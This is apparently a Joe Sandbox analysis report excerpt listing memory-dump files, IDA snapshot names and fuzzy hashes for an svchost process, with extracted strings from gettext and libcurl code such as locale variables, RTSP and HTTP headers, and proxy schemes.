                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: InfoLocalegetenv
                                                                                                                                                                                • String ID: GETTEXT_MUI
                                                                                                                                                                                • API String ID: 2555521601-170423343
                                                                                                                                                                                • Opcode ID: 89fa7b570720d1443cf1457af1e69c30a52156b8f6ea37245c8a65ad3bc83e3f
                                                                                                                                                                                • Instruction ID: b49fcd2a8cc74ed5b70951584eef059db10b4d9fdf0e1c9750844e1486022657
                                                                                                                                                                                • Opcode Fuzzy Hash: 89fa7b570720d1443cf1457af1e69c30a52156b8f6ea37245c8a65ad3bc83e3f
                                                                                                                                                                                • Instruction Fuzzy Hash: A8F06DB4720A6BD1EF549F16E8E03B12222FF10349FC48536C61E436A4EF6DC5A8C340
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CurrentProcesshtons
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2530476045-0
                                                                                                                                                                                • Opcode ID: 64b6e4926ee2df49b655fdd05138139a729cfca90a5e93a070b7b4ef1d2ab156
                                                                                                                                                                                • Instruction ID: e839b57cbd3aa288c56606fa02267bb682ec43785639c3394fa5256f2d4411dd
                                                                                                                                                                                • Opcode Fuzzy Hash: 64b6e4926ee2df49b655fdd05138139a729cfca90a5e93a070b7b4ef1d2ab156
                                                                                                                                                                                • Instruction Fuzzy Hash: 80018E229247D0CAD304CF35E1401AE37B0FB68B88B04D61AFB8987B18EB38D6E1C744
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen$getenv$_getcwdabortpthread_rwlock_rdlockpthread_rwlock_unlockstrchrstrcmp
                                                                                                                                                                                • String ID: .mo$GETTEXT_LOG_UNTRANSLATED$LANGUAGE$LC_ALL$LC_COLLATE$LC_CTYPE$LC_MESSAGES$LC_MONETARY$LC_NUMERIC$LC_TIME$LC_XXX$POSIX$c:/pgBuild64/share/locale
                                                                                                                                                                                • API String ID: 3750947721-4007712117
                                                                                                                                                                                • Opcode ID: 68401e532626dd40a5b3e62f6660bde5737612cb58aaa58669e7dc20f52abc5a
                                                                                                                                                                                • Instruction ID: f011620836108e1b7c2009a97093d1dd8185af0f3e35be7b8fe576876f480b0b
                                                                                                                                                                                • Opcode Fuzzy Hash: 68401e532626dd40a5b3e62f6660bde5737612cb58aaa58669e7dc20f52abc5a
                                                                                                                                                                                • Instruction Fuzzy Hash: 7002EDB6715A49CAEF24CF26A4507A837A9FB05B98FC48216DE6D177C4EF39C058C340
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free$_strdup$inet_pton$_time64callocmallocqsortstrchrstrncmp
                                                                                                                                                                                • String ID: /$/$Included max number of cookies (%zu) in request!
                                                                                                                                                                                • API String ID: 3681627800-3317691674
                                                                                                                                                                                • Opcode ID: 6b994be4170b75295a5c9142574b17f281e02c3573dd166e1a5206b0c3d3cb54
                                                                                                                                                                                • Instruction ID: f87081e523505894734928aa8a97fd3e55ce62fae8a74e4ca5aa3521d2667e8f
                                                                                                                                                                                • Opcode Fuzzy Hash: 6b994be4170b75295a5c9142574b17f281e02c3573dd166e1a5206b0c3d3cb54
                                                                                                                                                                                • Instruction Fuzzy Hash: F7C17625A0AB4286EF558F2E94606792BA0AF4DBE9F0C1135CF5E037D5DF3CE4428718
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strcmp$_strdupfree$abortmallocmemcpystrlen$pthread_rwlock_unlockpthread_rwlock_wrlock
                                                                                                                                                                                • String ID: 8`)h$pq)h
                                                                                                                                                                                • API String ID: 1031399696-283867673
                                                                                                                                                                                • Opcode ID: fa6e045d9bea026bd0bbc77c90f8608cd4fccbe572ecb1a5a30685ecf899a690
                                                                                                                                                                                • Instruction ID: 5793e577236a2a3729ad3064a16418873e0c77d2e3cfaac9fddc10f9c11526e5
                                                                                                                                                                                • Opcode Fuzzy Hash: fa6e045d9bea026bd0bbc77c90f8608cd4fccbe572ecb1a5a30685ecf899a690
                                                                                                                                                                                • Instruction Fuzzy Hash: 79A1CEA670579E85EF199F17A90476923A5BB45BC9FC88029DE7A477C0EF38C0D8C300
                                                                                                                                                                                APIs
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B83A0E99
                                                                                                                                                                                  • Part of subcall function 00007FF8B8377C70: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF8B836228F), ref: 00007FF8B8377C7C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID: %s %s RTSP/1.0CSeq: %ld$%s%s%s%s%s%s%s%s$Accept$Accept-Encoding$Accept-Encoding: %s$Accept: application/sdp$CSeq$CSeq cannot be set as a custom header.$Content-Length$Content-Length: %lld$Content-Type$Content-Type: application/sdp$Content-Type: text/parameters$Failed sending RTSP request$OPTIONS$Range$Range: %s$Referer$Referer: %s$Refusing to issue an RTSP SETUP without a Transport: header.$Refusing to issue an RTSP request [%s] without a session ID.$Session$Session ID cannot be set as a custom header.$Session: %s$Transport$Transport: %s$User-Agent
                                                                                                                                                                                • API String ID: 1294909896-1242481014
                                                                                                                                                                                • Opcode ID: 6de470ca8979119778e1d9fe9736211ae4141125122982335b1f04a560a96ee5
                                                                                                                                                                                • Instruction ID: 5cda01423990b991762a315d90349e122bbac0babfc972dbe17e91fb480570de
                                                                                                                                                                                • Opcode Fuzzy Hash: 6de470ca8979119778e1d9fe9736211ae4141125122982335b1f04a560a96ee5
                                                                                                                                                                                • Instruction Fuzzy Hash: 03027825B08B4781EB659B29E8502BD6391AF8CBD4F4C0135DF4E87795EF3CE5428748
                                                                                                                                                                                APIs
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000003,00000000,00000000,00007FF8B83B7836), ref: 00007FF8B83B8615
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000003,00000000,00000000,00007FF8B83B7836), ref: 00007FF8B83B861F
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000003,00000000,00000000,00007FF8B83B7836), ref: 00007FF8B83B8629
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000003,00000000,00000000,00007FF8B83B7836), ref: 00007FF8B83B8633
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,00000003,00000000,00000000,00007FF8B83B7836), ref: 00007FF8B83B863D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID: Unsupported proxy '%s', libcurl is built without the HTTPS-proxy support.$Unsupported proxy scheme for '%s'$Unsupported proxy syntax in '%s': %s$http$https$localhost$localhost%s$socks$socks4$socks4a$socks5$socks5h
                                                                                                                                                                                • API String ID: 1294909896-2475019931
                                                                                                                                                                                • Opcode ID: adeeeba3dcb348d9476662ba3a31bedae19bdb0b4bf3f98c1dbbcfd864b5a30e
                                                                                                                                                                                • Instruction ID: 24d0d3d7ceac89c7f5030773537b4b8a76973f03f807d82da631d82f42a9d624
                                                                                                                                                                                • Opcode Fuzzy Hash: adeeeba3dcb348d9476662ba3a31bedae19bdb0b4bf3f98c1dbbcfd864b5a30e
                                                                                                                                                                                • Instruction Fuzzy Hash: 28D16862F08A528AFB509B69E9507BD23A4BB4C7D8F480431CF0D97795EF3CE9468358
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: malloc$AddressErrorHandleLastModuleProcfreegetenvstrlen
                                                                                                                                                                                • String ID: Control Panel\Desktop\ResourceLocale$GETTEXT_MUI$GetUserDefaultUILanguage$GetUserPreferredUILanguages$kernel32
                                                                                                                                                                                • API String ID: 3902095595-2289094478
                                                                                                                                                                                • Opcode ID: 21e21060ab22e19c0057544d49dc994c67e1fed5d76d5ac555a023b2adc1326b
                                                                                                                                                                                • Instruction ID: 38b5980a306fdc30fed06c58795f7f79584b12b8151343d07193e4e45856cd52
                                                                                                                                                                                • Opcode Fuzzy Hash: 21e21060ab22e19c0057544d49dc994c67e1fed5d76d5ac555a023b2adc1326b
                                                                                                                                                                                • Instruction Fuzzy Hash: 298114A232568A85FF24CB15E89876A63A1FB45B99FC44121DF6903BD9EF7DC089C700
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: isspace$memcpy$fgetsstrchrstrlen$fclosefeoffopenstrncmp
                                                                                                                                                                                • String ID: /locale.$alia
                                                                                                                                                                                • API String ID: 523396729-523676055
                                                                                                                                                                                • Opcode ID: 04261a65dc28761269acb7c0fe0fd7a86babc1b59ef0ae2537ad78eed26fec8f
                                                                                                                                                                                • Instruction ID: d9bb909458fd9b5863b6121e32ed405b49ccec497aac49aec8738c1b05d92f08
                                                                                                                                                                                • Opcode Fuzzy Hash: 04261a65dc28761269acb7c0fe0fd7a86babc1b59ef0ae2537ad78eed26fec8f
                                                                                                                                                                                • Instruction Fuzzy Hash: C391E6B6705B9A84EF048B62A91436E77B2FB04BDDF848516CE6D17798EF39C069C300
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID: %s auth using %s with user '%s'$%s:%s$%sAuthorization: Basic %s$AWS_SIGV4$Authorization$Authorization: Bearer %s$Basic$Bearer$Digest$NTLM$Negotiate$Proxy$Proxy-$Proxy-authorization$Server
                                                                                                                                                                                • API String ID: 1294909896-3819500859
                                                                                                                                                                                • Opcode ID: c25993062e5f4af2a2131b15a51b3fb58fce6aff02cf8371dbbe6467a7a0ab5a
                                                                                                                                                                                • Instruction ID: d9ee0119e48fba4d3773ea7bc5300b5271535713d40c9cec389366ff22e47d02
                                                                                                                                                                                • Opcode Fuzzy Hash: c25993062e5f4af2a2131b15a51b3fb58fce6aff02cf8371dbbe6467a7a0ab5a
                                                                                                                                                                                • Instruction Fuzzy Hash: 1B916E21B09B8796EBA58B19A4503BA63E0FF4C7D4F484131DB4D87796DF3CE9468708
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3268094549.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3268053288.0000000068280000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268141358.0000000068296000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268183612.0000000068297000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268226843.00000000682A0000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268266212.00000000682A1000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682A5000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3268321447.00000000682EC000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_68280000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: strlen$abortfopenfputcfreemallocmemcpypthread_mutex_lockpthread_mutex_unlockstrchrstrcmp
                                                                                                                                                                                • String ID: msgctxt $msgid $msgid_plural $msgstr ""$msgstr[0] ""$domain
                                                                                                                                                                                • API String ID: 985736648-3246038991
                                                                                                                                                                                • Opcode ID: 25d9d2dfaedb83549daff8720488ac3f8dd73d7e40b7b9db348dcd54c8cf9ab0
                                                                                                                                                                                • Instruction ID: 5976ffaac5bd5dce512531b6ec285da5e1eb20cad23f156419773a073e7cc1d2
                                                                                                                                                                                • Opcode Fuzzy Hash: 25d9d2dfaedb83549daff8720488ac3f8dd73d7e40b7b9db348dcd54c8cf9ab0
                                                                                                                                                                                • Instruction Fuzzy Hash: 4C418FA938164E94EE14DB57E8643B92392BB49FC5FC89632CD2A4B398DF3DC0588310
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00007FF8B83A7E60: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B83A7E87
                                                                                                                                                                                  • Part of subcall function 00007FF8B83A7E60: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B83A7E93
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8B83930B3
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8B83930BB
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8B83930EA
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8B83930F3
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8B8393179
                                                                                                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF8B8393182
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_28_2_7ff8b8360000_svchost.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID: 8bit$; boundary=$; filename="$; name="$Content-Disposition$Content-Disposition: %s%s%s%s%s%s%s$Content-Transfer-Encoding$Content-Transfer-Encoding: %s$Content-Type$Content-Type: %s%s%s$application/octet-stream$attachment$form-data$multipart/$multipart/form-data$multipart/mixed$text/plain
                                                                                                                                                                                • API String ID: 1294909896-1595554923
                                                                                                                                                                                • Opcode ID: 6bb20e36db68b8f4f98039559354be7d6c1da1e1d29d17a6912262ba3e44696c
                                                                                                                                                                                • Instruction ID: 8e0c994e93a64ff2f89db39d31303a860cd42a8a118e959a9d372ee1905076ee
                                                                                                                                                                                • Opcode Fuzzy Hash: 6bb20e36db68b8f4f98039559354be7d6c1da1e1d29d17a6912262ba3e44696c
                                                                                                                                                                                • Instruction Fuzzy Hash: B4E19962B09B8392FA659B1A95802B967A0FF49BC4F4C5435CF5E07785EF3CE9528308
                                                                                                                                                                                APIs
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000001C.00000002.3270133340.00007FF8B8361000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B8360000, based on PE: true
                                                                                                                                                                                • Associated: 0000001C.00000002.3270115410.00007FF8B8360000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270194651.00007FF8B83E7000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270212811.00007FF8B83E8000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270230413.00007FF8B83E9000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                • Associated: 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
